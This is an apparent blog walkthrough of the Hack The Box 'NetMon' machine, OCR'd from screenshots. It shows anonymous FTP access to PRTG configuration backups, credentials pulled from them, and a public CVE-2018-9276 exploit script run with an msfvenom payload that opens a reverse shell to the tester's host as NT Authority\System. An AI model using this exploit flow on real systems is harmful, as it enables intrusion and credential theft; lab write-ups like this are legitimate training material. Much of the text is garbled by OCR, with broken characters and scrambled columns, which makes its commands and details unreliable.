HTB – NetMon Walkthrough

nmap

PORT
21/tcp
STATE SERVICE
open ftp
VERSION
Microsoft ftpd
ftp-anon:
02-03-19
02-25-19
07-16-16
02-25-19
02-03-19
02-03-19
02-25-19
ftp-syst:
Anonymous
10 : 15PPl
09: 18Am
10
12 : 28AM
08 : 08APl
11:49PPl
FTP
SYST: Windows NT
80/tcp open http
login
Indy
I http-favicon: Unknown favicon
I http-methods:
Supported methods: GET HEAD
I http-server-header: PRTG/18.1.
allowed (FTP code 230)
1024 .rnd
inetpub
perfLogs
Program Files
Program Files (x86)
Users
Windows
httpd 18. 1.37. 13946 (Paessler PRTG bandwidth monitor)
3683EF286FA48EF88797A09668456479
POST OPTIONS
37 . 13946
I http-title: Welcome I PRTG Network monitor (NETMON)
I Requested resource was / index. htm
I http-trane-
135/tcp
139/tcp
445/tcp
Service
open
open
open
Info:
info: Problem
msrpc
netbios-ssn
microsoft-ds
OSS : Windows,
with XML parsing of /evox/about
Microsoft Windows RPC
Microsoft Windows netbios-ssn
Microsoft Windows Server 2008 R2
2012 microsoft-ds
Windows Server 2008 R2
2012; CPE: cpe:/o:microsoft:windows

Anonymous FTP

0 1 ne system cannot
T In
o tne
ftP> Is -la
200 PORT command successful.
T 1 ce spec1T1eo.
125 Data
11-20-16
02-03-19
11-20-16
07-16-16
02-03-19
02-25-19
07-01-19
07-16-16
02-25-19
02-03-19
02-25-19
02-03-19
02-03-19
02-03-19
02-25-19
connection already open; Transfer starting.
10 : 46pm
12: 18M
09
08 : 05M
10 : 15PPl
12
09: 18M
12: 28M
08 : 05M
08 : 04M
08 : 08M
11
complete.
1024
389408
1
738197504
$RECYCLE . BIN
. rnd
bootmgr
BOOTNXT
Documents and Settings
inetpub
pagefile.sys
perfLogs
Program Files
Program Files (x86)
ProgramData
Recovery
System Volume Information
Users
Windows
226 Transfer
ftP> cd ProgramData
250 CWD command successful.

PRTG Files are under C:\ProgramData\Paessler\PRTG Network Manager

ftP> cd ProgramData
250 CWD command successful.
ftP> Is
200 PORT command successful.
125 Data
02-03-19
11-20-16
02-03-19
02-03-19
07-16-16
02-03-19
11-20-16
11-20-16
02-25-19
connection al ready open;
12: 15AM
10
12: 18AM
08 : 05AM
09: 18AM
12: 15AM
10
complete.
226 Transfer
ftP> cd Paessler
250 CWD command successful.
ftP> Is -la
200 PORT command successful.
125 Data connection al ready open;
07-01-19 03:38PPl
226 Transfer complete.
ftP> cd ”PRTG Network Monitor"
250 CWD command successful.
ftP> Is
200 PORT command successful.
Transfer star ting.
Licenses
Microsoft
Paessler
regid. 1991-06. com . microsoft
SoftwareDistribution
TEMP
USOPrivate
USOShared
VMware
Transfer star ting.
PRTG Network Monitor
Transfer star ting.
125 Data
02-03-19
07-01-19
02-03-19
02-03-19
02-03-19
07-01-19
07-01-19
02-25-19
02-25-19
connection al ready open;
12 :
12: 18AM
12: 18AM
12: 18AM
1189697
1189697
Configurat ion Auto-Backups
Log Database
Logs (Debug)
Logs (Sensors)
Logs (System)
Logs (Web Server)
Monitoring Database
PRTG Configurat ion. dat
PRTG Configurat ion. old

Looking for password

cat
"PRTG Configuration.old.bak"
grep
-C 3 prtgadmin
</dbcredentials>
<dbpassword>
User: prtgadmin
PrTg@dmin2018
</dbpassword>
<dbtimeout>
43499 . 7768071065
prtgadmin
<name>
PRTG System Administrator
root@kati : /home/kaIisa/HTB/netmon#

The version of PRTG is vulnerable

Use the following exploit:

https://raw.githubusercontent.com/wildkindcc/CVE-2018-9276/master/CVE-2018-9276.py

python CVE-2018-9276.py -i
80 --lhost
10.10. 10.152
10.10. 14.13
-p
[PRTG/18.1.37.13946] is Vulnerable!
Exploiting [10. 10. 10. 152: 80] as [prtgadmin/PrTg@dmin2019]
Session obtained for [prtgadmin:PrTg@dmin2019]
-Iport 8888
--user prtgadmin
- -password PrTg@dmin2019
File staged at successfully with objid of
Session obtained for [prtgadmin:PrTg@dmin2019]
Notification with objid [2018] staged for execution
[2018]
Generate msfvenom payload with [LHOST=IO. 10. 14.13 LPORT=8888 OUTPUT=/tmp/nhgcapgw.dll]
No platform was selected, choosing Plsf: :module: :Platform: :Windows from the payload
No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of dll file: 5120 bytes
Config file parsed
Callback added for UUID 48324FC8-1670-01D3-1278-5A478F6EE188 V:3.O
Callback added for UUID 68FFD098-A112-3610-9833-46C3F87E345A V: 1.0
Config file parsed
Hosting payload at
Session obtained for [prtgadmin:PrTg@dmin2019]
Command staged at successfully with objid of [2019]
Session obtained for [prtgadmin:PrTg@dmin2019]
Notification with objid [2019] staged for execution
Attempting to kill the impacket thread
Impacket will maintain its own thread for active connections, so you may find it's still listening on
ps aux I grep <script name> and kill -9 <pid> if it is still running : )
The connection will eventually time out.
Listening on [10.10.14.13:8888 for the reverse shell!]
listening on [any] 8888
Incoming connection (10.10. 10. 152, 53994)
AUTHENTICATE MESSAGE (N, NETMON)
[ *J User \NETPION authenticated successfully
:4141414141414141

I got NT Authority\System

[+] Listening on [10.10.14.13:8888 for the reverse shell!]
listening on [any] 8888
Incoming connection (10.10. 10.152, 53994)
AUTHENTICATE MESSAGE (N, NETMON)
[ *J User \NETPION authenticated successfully
:4141414141414141
connect to [10.10. 14.13] from (UNKNOWN) [10.10. 10.152]
Microsoft Windows [Version 10.0. 14393]
(c) 2016 Microsoft Corporation. All rights reserved.
Disconnecting Share(1:IPC$)
whoami
whoami
nt authority\system
53996

Leave a comment Cancel reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.